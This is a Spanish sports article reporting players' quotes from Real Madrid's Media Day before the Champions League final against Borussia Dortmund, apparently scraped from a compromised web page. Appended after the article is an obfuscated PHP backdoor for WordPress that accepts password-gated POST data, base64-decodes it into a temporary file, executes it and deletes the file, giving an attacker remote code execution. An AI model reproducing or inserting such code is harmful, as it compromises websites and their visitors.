Vinicius y la posible llegada de Mbappé: “Hay que hablar con el presi… Kylian decide”

El brasileño fue uno de los protagonistas del Media Day del Real Madrid antes de la final y dijo que le daría el Balón a Bellingham y le inglés le devolvió el deseo.

El Media Day del Real Madrid previo a la final del sábado ha dejado patente el buen rollo en el seno del vestuario blanco y la enorme confianza en sus posibilidades de alzar la Decimoquinta en Wembley. Las estrellas blancas pasaron por una zona mixta especial para analizar el gran partido del año. Vinicius y Bellingham mostraron que sienten un feeling mutuo, también ante los micrófonos. “El Balón de Oro se lo daría a Bellingham”, aseguró el brasileño.

Esto fue lo más destacado de las impresiones de los futbolistas madridistas…

Vinicius, sobre cómo prepara a nivel personal la final. “Siempre veo partidos de los centrales y los laterales a los que me voy a medir. Le pido a mi equipo que me lo prepare. Lo estudio, para ver cómo pueden intentar bloquearme. Ahora tengo que mirar también los de los porteros, porque lanzo los penaltis”. El papel de Ancelotti en este nuevo Vini. “Me convenció en el cambio de posición, yo no quería. Me ha enseñado a jugar también por dentro. En un año he evolucionado más que en todo lo anterior”. Bellingham le devolvió las flores al brasileño. “Cuando Vini está a tope, es indefendible. Siempre lo digo, el mejor”. El inglés se medirá a un rival que conoce muy bien. “No he hablado con ningún excompañero esta semana. Hablé con Sancho y dijimos que nos veríamos allí. Es gente que me acogió bajo su ala cuando llegué y para mí significa mucho”. También se refirió a la posible llegada de Mbappé y afirmó: “Hay que hablar con el presi, y a ver qué dice Kylian, él decide su futuro”.

Tomó el testigo el héroe contra el Bayern, Joselu. “Tenemos mucha gente con mucha experiencia y te vas guiando un poco con ellos, que te cuenten cómo es. Trato de inspirarme en estos cabrones que llevan cinco o seis finales”. El gallego no se fía del Borussia. El partido para mí está al cincuenta-cincuenta, hay que preparar la final así, analizar bien al Dortmund porque han hecho una gran Champions”

Si acaso hay que acudir a la tanda de penaltis, ahí estará presto y dispuesto Lucas Vázquez. “Lo llevo por dentro. Es un momento que gracias a Dios salieron bien, hemos conseguido pasar en penaltis contra el City. Estamos muy felices por ello. Controlar los nervios… tampoco. Durante el partido el equipo sufrió mucho, no estamos acostumbrados a jugar tan defensivos. Sabíamos que los penaltis eran nuestro momento. Estábamos con esa confianza”.

Carvajal: “Imprimimos miedo en los rivales”

Uno de los pesos pesados, Carvajal, explicó el porqué de este instinto asesino del Madrid en la Copa de Europa. “Tantas Champions da un poco de mareo, pero se nota cuando jugamos en esta competición, imprimimos miedo en los rivales”. Una tesitura en la que está también Nacho. “Es una locura. Hay compañeros y yo que estamos a un paso de igualar a Gento. Es una oportunidad de hacernos felices y a la afición. Soy un afortunado”.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}